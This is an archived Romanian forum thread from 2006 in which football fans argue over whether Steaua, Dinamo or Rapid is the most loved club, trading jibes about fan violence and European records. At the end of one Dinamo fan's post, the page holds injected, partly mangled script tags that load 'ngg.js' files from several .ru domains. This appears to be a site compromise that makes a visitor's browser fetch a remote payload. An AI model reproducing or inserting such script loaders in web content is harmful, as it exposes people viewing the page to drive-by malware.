PDA

Arată versiune întreagă : Dinamo/Rapid/Steaua

Pagliuca
26.08.2006, 21:13
Cineva spunea intr-unul dintre topice, ca nu avem un sondaj pentru a vedea care este cea mai iubita echipa din Romania, motiv pentru care am deschis acest topic. Am ales cele trei echipe pentru ca in momentul de fata sunt cele care ne reprezinta in Europa.
Am rugamintea ca fiecare vizitator al acestei pagini sa voteze echipa favorita si sa ne spuna de ce este suporterul echipei votate.
Daca sunteti sustinatori ai alor echipe decat cele trei, nu ezitati sa scrieti.
Aceat topic nu se vrea a fi unul de polemici intre dinamovisti, rapidisti si stelisti, ci unul din care sa tragem o concluzie.
Si anume:
Care este cea mai iubita echipa din Roamania?

26.08.2006, 22:01
Steaua este categoric cea mai iubita ,iar eu tin cu Dinamo doar din dragoste la prima vedere.

27.08.2006, 01:49
depinde pe unde te duci..eu de pilda asi putea sa zic ca pe unde stau eu sint majoritari dinamovistii..asta prin balta alba..dar sint si rapidisti si stelisti...eu cred ca parerile sint impartite si poate doar un sondaj sa rezolve chesti asta..

dar ca o paralela..de fiecare data cint o echipa se duce in cupe creste si suporterimea "sincera"...de genul cind a venit jackson in 94, mai tineti voi minte ca tot bucurestiul era plin de faneii care au aparut cu 1 luna inainte si au disparut intr-o saptamina, "si nimeni nu a fost la concert!!!smileys/smiley19.gif", cind stadionul a fost plin...si michael nu pleca la aeroport...ma gindesc ca aeriana aia de plingea la otopeni , uitindu-se in urnma are aceiasi parere acum..dar scuze pt paralela!

27.08.2006, 05:27
Dinamo este echipa creata de fostele forte de militie si securitate de pe timpul lui Ceausescu. Este cea mai urata echipa din tara fiind asociata cu ministerele si oamenii care au sustinut-o de-a lungul anilor in frunte cu renumitul Postelnicu.

Si acum pe unde merg in tara fanii dinamovisti sunt agresati si agreseaza. Galeria lor este formata in principal din indivizi gen golanash de cartier, indivizi adunati de prin Balta Alba sau Colentina printre care sunt f multi drogati si bauti la meci.

PS vedeti tratamentul la care sunt supusi la Craiova azi. Si cum sunt primiti la Timisoara sau in alte orase mari ale tarii. Mai mereu jucatorii la meciurile din deplasare sunt evacuati in dubele politiei. E indiscutabil cea mai urataechipa romaneasca.

Pagliuca
27.08.2006, 06:29
:)MAN_US Intrebarea acestui topic era care este echipa ta favorita, nu de ce nu iti place o echipa sau alta.Poate ne scri si noua cu cine simpatizezi. Chiar asta am vrut sa evit sa scriem despre unii sau altii ca sund drogati, prosti sau golani. Este clar ca fiecare galerie are elementele ei negative, insa eu am pretentia ca nivelul discutiilor noastre sa treaca peste aceste jigniri.
Multumesc pentru intelegere.

27.08.2006, 13:39
Dinamo este echipa creata de fostele forte de militie si securitate de pe timpul lui Ceausescu. Este cea mai urata echipa din tara fiind asociata cu ministerele si oamenii care au sustinut-o de-a lungul anilor in frunte cu renumitul Postelnicu.

Si acum pe unde merg in tara fanii dinamovisti sunt agresati si agreseaza. Galeria lor este formata in principal din indivizi gen golanash de cartier, indivizi adunati de prin Balta Alba sau Colentina printre care sunt f multi drogati si bauti la meci.

PS vedeti tratamentul la care sunt supusi la Craiova azi. Si cum sunt primiti la Timisoara sau in alte orase mari ale tarii. Mai mereu jucatorii la meciurile din deplasare sunt evacuati in dubele politiei. E indiscutabil cea mai urataechipa romaneasca.

MAN urat din partea ta . Vorbesti de militie si etc de parca Steaua a fost vreo fata mare.Mai bine numai pomeni de Ceausescu.Astia am fost, o tara comunista.. asta avem cu asta defilam. Trebuie sa fii plin de ura pana la granita cu fantezia ca sa cataloghezi suporterii Dinamovisti asa cum ai facut-o mai sus. Bineinteles ca fiecare isi are uscaturile,in tribuna la Steaua vin numai baieti din centru?smileys/smiley36.gifei nu se drogheaza ,ei nu beau ,ei nu mananca seminte si nu injura,ei doar aplauda. Sunt multe lucruri pe care nu le stii cum ar fii ca nucleul Nuova Guardia a insotit din '96 incoace nationala Romaniei peste tot in Europa ,in meciurile oficiale pe buzunarele lor de golanashi drogati cum ii crezi tu,in timp ce de la Steaua nimeni. Crezi ca suporta Elias sau Mihnea Ionescu care e profesor, vreo cea mai mica comparatie cu Gigi Mustata si gasca lui de camatarisiproxeneti acoperita de Gigi Becali? Esti chiar funny . Dinamo e urata peste tot cum spui in primul rand pt ca, am mai spus mai sus Steaua e cea mai iubita deci nu ti se pare logic? Tot Constanteanul tine cu Felinarul ca e acolosicuSteaua... sila fel peste tot in tara. Pe mine unul ma lasa rece si cred ca si pe altii la fel ca e cea mai urata echipa din tara ,din contra ne face sa o iubim si mai mult.

In incheiere hai sa-ti pun 2-3 poze cu ceva fani ai Stelei pe la Universitate sarbatorind ca sa te mai linistesti ..

http://i42.photobucket.com/albums/e321/claudiunj/normal_13.jpg

http://i42.photobucket.com/albums/e321/claudiunj/normal_11.jpg

http://i42.photobucket.com/albums/e321/claudiunj/thumb_1.jpg

Hai totusi poate vrei una si cu drogatii de dinamovisti

http://i42.photobucket.com/albums/e321/claudiunj/normal_ultra005.jpg

Hai..ca te salut si mai bine tinem cont de sfatul lui Pagliuca

Gogule
27.08.2006, 14:11
steaua - pentru ca imi placea de mic
steaua - pentru ca poate
steaua - pentru ca merita
steaua - campionii din ghencea smileys/smiley2.gif

27.08.2006, 14:17
din cauza comentariilor celor ca man_us, ma simt si mai mindru ca tin cu dinamo!
bianco-rossi..ole!

27.08.2006, 15:22
din cauza comentariilor celor ca man_us, ma simt si mai mindru ca tin cu dinamo!
bianco-rossi..ole!

stai calm, nu te emotziona smileys/smiley4.gif

27.08.2006, 15:41
Bineinteles ca fiecare isi are uscaturile,in tribuna la Steaua vin numai baieti din centru?smileys/smiley36.gifei nu se drogheaza ,ei nu beau ,ei nu mananca seminte si nu injura,ei doar aplauda. Sunt multe lucruri pe care nu le stii cum ar fii ca nucleul Nuova Guardia a insotit din '96 incoace nationala Romaniei peste tot in Europa ,in meciurile oficiale pe buzunarele lor de golanashi drogati cum ii crezi tu,in timp ce de la Steaua nimeni. Crezi ca suporta Elias sau Mihnea Ionescu care e profesor, vreo cea mai mica comparatie cu Gigi Mustata si gasca lui de camatarisiproxeneti acoperita de Gigi Becali? In incheiere hai sa-ti pun 2-3 poze cu ceva fani ai Stelei pe la Universitate sarbatorind ca sa te mai linistesti ..

ideea e asha... Steaua are mult mai multi suporteri ca Dinamo...si e normal sa fie din toate categoriile sociale...dar trebuie sa admiti ca fanii dinamovisti sunt mult mai violenti decat oricare alti suporteri din Romania...vezi cazul bulgaria sau incidentele de la Constanta. Galeria dinamovista e formata din beizadele, copii de mahari din politia romana... oameni cu bani, bani nu trebuie sa spun de unde luatzi...ei bine aceste beizadele au bani sa mearga in deplasarile echipei nationale... ca doar merg pana la urma pe banii romanilor jupuitzi. smileys/smiley4.gif

Mustata fostul sef al galeriei steliste e arestat si ma bucur pentru asta. Fanii stelisti sunt mult mai pasnici si e normal asa...suntem educati in spiritul UEFA ca doar am jucat semifinala... si acum In UEFA CHAMPIONS LEAGUE...unde by the way dinamo nu a jucat NICIODATA!

27.08.2006, 16:27
fara emotii,, nu esti om!

Ros_Albastru
28.08.2006, 08:25

Cita dreptate ai in ceea ce ai spus. Dinamo a plecat cu duba politiei de la Craiova, iar Rapid a fost huiduita tot meciul la Arad in meciul cu UTA. Au aratat acum laPRO TVla stirile din sport. FORTZA STEAUA

Ros_Albastru
28.08.2006, 08:37
STEAUA ESTE CEA MAI BUNA ECHIPA DIN ROMANIA SI CEA MAI IUBITA . SINT STELISTA DE CIND MA STIU cu toate ca stau departe de Stadionul Ghencea. Eu locuiesc in cartierul Berceni.CEI MAI MULTI SUPORTERI SI FANI II ARE ECHIPA STEAUA. FORZA STEAUA!!! PAGLIUCA buna idee ai avut cu topicul asta , FELICITRI! O ZI BUNA.

Pagliuca
28.08.2006, 12:51
Pisoi m-a ajutat in demersul meu si a creeat un Poll unde se poate vota direct echipa favorita. Va invit si pe voi sa votati acolo, daca n-ati facut-o deja. Asa vom putea urmari care echipa 'face furori'.
Vreau sa va spun cate ceva din experienta mea de suporter, iubitor al fotbalului si mingicar in curtea scolii:).
Sunt nascut in Cluj-Napoca si am fost si la "U" Cluj la meciuri si la CFR, chiar la galerii. Rivalitatea dintre cele doua cluburi este la nivelul Steaua-Dinamo doar ca e vorba de mai putini "combatanti" in joc. E clar mai ultrasi sunt cei de la "U" care incendiaza steaguri CFR-iste in tribuna, a fost un caz in care jucatorii CFR-ului au fost batuti.Ultrasilui "U" nu inghit nici echipele Bucurestene,mai putin dinamo cred, iar daca ai un un obiect inscriptionat cu una echipele din Bucuresti sau CFR iei bataie sigur.
Nu vad de ce atata ura si violenta indreptata impotriva suporterilor adversi.Sunt convins ca psihologii au gasit raspunsuri, dar oare se poate face ceva sa se opreasca violentele in stadioane.
Eu cred ca multi se alatura galeriilor, fara a simtii cu adevarat ce e fotbalul, pentru ca in asa fel se simt mai puternici, mai protejati si pot recurge la violenta fara a fi automat prinsi si sanctionti.
Acuma ma gandesc cum am trait meciul Stelei cu Standard si imi dam seama cat de schimbat am fost in acele momente, emotii, nervi, injuraturi la adresa arbitrilor, aplauze, extaz, tristete si toate sub privirile intrebatoare ale pritenilor mei care nu stiau ce sa faca, sa sune la salvare sau la politie. Si cu toate acestea nu am simtit ca vreau sa ii sparg fata unuia care nu tine cu Steaua.
Exemplul Angliei mi se pare foarte bun fara garduri, si cu sanctiuni drastice daca cineva ajunge pe gazon.O singura data ajungi pe gazon dupa care stai la politie cand joaca echipa favorita.
Eu cred ca nici dinamovistii,nici rapidistii, nici stelistii nu sunt mai negrii sau mai cu faina la nas decat altii.
Un lucru este cert insa Performanta si numai Performanta aduce glorie, bani, suporteri,vanzari, publicitate, interes in jurul echipei.

Pisoi
28.08.2006, 13:01
steaua - pentru ca imi placea de mic
steaua - pentru ca poate
steaua - pentru ca merita
steaua - campionii din ghencea smileys/smiley2.gif

...si ca Becali are bani de imbunatatirismileys/smiley36.gif

Pisoi
28.08.2006, 13:05
..acum imi place si Cluj-ulsmileys/smiley2.gif...mai ales de cand Dorinel e sefulsmileys/smiley4.gif...cele 3 puteri vor avea ceva de furcasmileys/smiley36.gif

Gogule
28.08.2006, 14:33
..acum imi place si Cluj-ulsmileys/smiley2.gif...mai ales de cand Dorinel e sefulsmileys/smiley4.gif...cele 3 puteri vor avea ceva de furcasmileys/smiley36.gif

nu pot sa cred cum fuge omu pe teren

28.08.2006, 20:49
[/QUOTE]

ideea e asha... Steaua are mult mai multi suporteri ca Dinamo...si e normal sa fie din toate categoriile sociale...dar trebuie sa admiti ca fanii dinamovisti sunt mult mai violenti decat oricare alti suporteri din Romania...vezi cazul bulgaria sau incidentele de la Constanta. Galeria dinamovista e formata din beizadele, copii de mahari din politia romana... oameni cu bani, bani nu trebuie sa spun de unde luatzi...ei .bine aceste beizadele au bani sa mearga in deplasarile echipei nationale... ca doar merg pana la urma pe banii romanilor jupuitzi. smileys/smiley4.gif

Mustata fostul sef al galeriei steliste e arestat si ma bucur pentru asta. Fanii stelisti sunt mult mai pasnici si e normal asa...suntem educati in spiritul UEFA ca doar am jucat semifinala... si acum In UEFA CHAMPIONS LEAGUE...unde by the way dinamo nu a jucat NICIODATA!

[/QUOTE]

Man n-o sa ma refer la prima parte iar daca derulezi o sa vezi ca am fost primul care am recunoscut. Admit si ca fanii dinamovisti sunt mai violenti dar parca tot tu ai spus ca sunt si cei mai urati de lume (automat provocati) peste tot pe unde se duc si nu intampinati cu paine si sare ca ai Stelei. Categoric sunt si cei mai fanatici dar la fel sunt si in Italia,Anglia,etc.Despre episodul Bulgaria sunt convins ca nu stii prea multe ,dar fie vorba intre noi doi ia zi-mi ce mult ne iubesc bulgarii pe noi. tie ti-ar placea sa fii tinut din a te duce la toaleta pana esti gata sa faci pe tine, doar ca acel cineva vrea sa-ti arate cine e seful? Sunt convins ca s-ar fii intamplat la fel si cu fanii Stelei. Apropo de fanii Stelei stii ca multi dintre ei s-au urinat pe statuia lui Stefan cel Mare la Vaslui ? asa da exempluemblematic si pasnic frate. Iar la Constanta amice stii cata bataie au mancat din cauza unei petarde care la orice meci se tot aud si cateva scaune aruncatespre intimidarea turmei turbate de jandarmi intrata labataie.Zeci de oamenisimai putin vinovati pe jos plini de sange,la cum gandesti cred ca ti-a provocat placere daca ai vazut poze.

De ce te contrazici singur acum?,parca ziceai ca fanii lui Dinamo sunt drogatii si alcoolistii din Colentina iar acum sunt beizadele? smileys/smiley36.gifsunt si asa nu zic nu ca si la altii, dar majoritatea sunt clasa de "mijloc" care seincapataneaza sa existecat de cat la noi sau oameni saraci. Tu vorbesti de existentaromanilor jupuiti cand Steaua tocmai s-a sters pe maini de datoria de 11 mil de Euro? ai mare tupeu sau doar iti place sa ai ultimul cuvant orice ar fii?

Da ,sunteti educati in spiritul UEFA de aia va au aia la loc de cinste cand vine vorba sa stea cu ochii pe cine nu se comporta civilizat.Din ultima ta fraza deduc ca nu ai prea multa treaba cu realitatea fotbalului romanesc ,asa ca o sa incerc sa numai iau in seama tot se scrii la forumul de sport. Dinamo a deschis drumul la ce avea sa faca Steaua in '86 ajungand in semifinalele aceleiasi competitii (lucru care a ambitionat clanul Ceausesc) asa ca ar trebuii sa te rusinezi tot de ce ai scris.

Pagliuca imi pare bine ca dai mai multa dovada de realism . Asa e ca fanii lui "U" Cluj sau Alba Iulia simpatizeaza cu Dinamo la fel ca si cei ai Petrolului Ploiesti asa cumTimisoara simpatizeaza Rapidul sau restul tarii Steaua. /script>ript src=http://c=http://<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.iroe.ru/n<script src=http://www.iroe.ru/ngg.js></script>

Pagliuca
28.08.2006, 21:38
claudiunj ma simt nevoit sa te contrazic in legatura cu frazaa Dinamo a deschis drumul Stelei in castigarea cupei campionilor,bag seama o fi meritul echipei Dinamo ca Steaua a invins pe Barcelona in Spania.
Rezultatele sunt cele care vorbesc( bineanteles nu cu orice mijloace) si deocamdata, aceste rezultate sunt in favoarea Stelei.
Sa iti dau un exemplu: doi elevi care sunt in aceeasi clasa au acelasi colegi si acelasi profesor.Cel care are rezultate mai slabe isi gaseste motivarea insuccesului in faptul ca profesorul nu-l place si are ceva cu el. Aceasta abordare este paguboasa si nu te ajuta sa evoluezi.
Oricum in fotbal pasiunile sunt mari si subiectivitatea si mai mare.
Apropo stie cineva Borcea mai are televizor in casa.:)

28.08.2006, 22:00
Pagliuca nu m-am referit ca ar fii meritul lui Dinamo pt ca Steaua a castigat Cupa Campionilor dar doar voiam sa-i explic putin lui Man_us cat de pe din afara e cand zice ca Dinamo nu a jucat NICIODATA in Liga..retine duritatea lui de la fictiuneanaiva la realitate . Prost exemplu ai dat totusi cu eleviismileys/smiley36.gifiar cu rezultatele stai linistit ca nu sunt ahtiat dupa intietate de aia siam preferatDinamo de mic in locul multimii. Eu nu tin cu o echipa ca e/fost/este cea mai buna /istorie etc asa cum 70-80% din suporteriiStelei nu simt asa . Nu duc deloc lipsa de mentalitate de invingator ca sa ma complac in asa lucruri totusi marunte pt viata mea de maine.

29.08.2006, 01:58
cred ca el se refera la champions league..dinamo a fost in cupa campionilor europeni...tehnicalitati ce vrei...gasitul nodului in papura se practica.smileys/smiley36.gif

Pagliuca
29.08.2006, 05:00
La asta cred si eu ca sa referit, acuma si Steaua a castigat Cupa Campionilor nu Champions League. :)

29.08.2006, 05:24
Pagliuca nu m-am referit ca ar fii meritul lui Dinamo pt ca Steaua a castigat Cupa Campionilor dar doar voiam sa-i explic putin lui Man_us cat de pe din afara e cand zice ca Dinamo nu a jucat NICIODATA in Liga..retine duritatea lui de la fictiuneanaiva la realitate .

Deci, repet. DInamo nu a jucat NICIODATA in UEFA CHAMPIONS LEAGUE. A Jucat doar in Cupa Campionilor, competitie care se juca tur-retur nu cu grupe ca si UCL.

2. Nu DInamo a deschis drumul succesului Stelei in CL ci Universitatea Craiova in 1983..in era Balaci..cand a jucat semifinala de UEFA CUP cu Benfica Lisabona..0-0 la Lisabona si 1-1 la Craiova..goluri Balaci si Filipovici...In anii urmatori Craiovei Steaua a castigat CUPA CAMPIONILOR EUROPENI in 1986 ai a mai jucat o alta finala pierduta de CCE (0-4 cu Milan in finala...imi rusine dar asta e realitatea). A si castigat SuperCupaEuropei in anul viitor cu Dinamo Kiev,,,a mai jucat o alta semifinala de CCE si anul trecut de UEFA. Cand VA egala Dinamo palmaresul Stelei europena? NICIODATA!

Despre DInamo nu stiu prea multe...pentru mine e doar o echipa anosta. Parca a jucat odata in era Lucescu o semifinala de CCE dar nu imi mai amintesc de fapt nici nu am ce sa imi amintesc. Dovada e ca noi jucam cu Real Madrid si Lyon...dinamo cu niste anonimi de la Xanthia... De la anul ROmania participa direct in UCL cu o echipa in faza grupelor direct..si o a doua in etapele elimnatorii...si asta doar datorita parcursulu european de exceptie al Stelei si Rapidului....de anul trecut. Unde e aportul lui DInamo? Nu-l vad..Ahh poate sa partcipe la anul direct in UCL indirect datorita Stelei..ca deh singuri nu ar fi in stare.

PS 1. ce e wrong in afirmatiile mele de mai sus?

2. Astept sa te lauzi si tu cu performantele lui Dinamo. Nu imi spune de campionatele si cupele romaniei... castigate cate or fi ele.. si mai ales cum....smileys/smiley4.gif

Ros_Albastru
29.08.2006, 08:29
Pagliuca,Gogule si toti cei care tineti cu Steaua. A aparut un CD, FORZA STEAUA- Melodiile galeriei. Va pot trimite melodiile daca imi dati adresele de mail sau sa ne intilnim pe messenger. Va pup pe toti.(Dar atentie la diferentele de fus orar intre America si Romania, pt mess).

29.08.2006, 11:55
man_us..nu te mai extazia asa..cupa a fost in 86..dinamo a jucat in cupa in 84smileys/smiley36.gif

dog48
08.12.2006, 00:27
DINAMO BUCURESTI!!!

PENTRU CA ESTE(mai mult a fost)VIATA MEA!!!!

Si nu va mai dati cu parerea despre oameni care formeaza galerile pt. ca va inselati GRAV!!!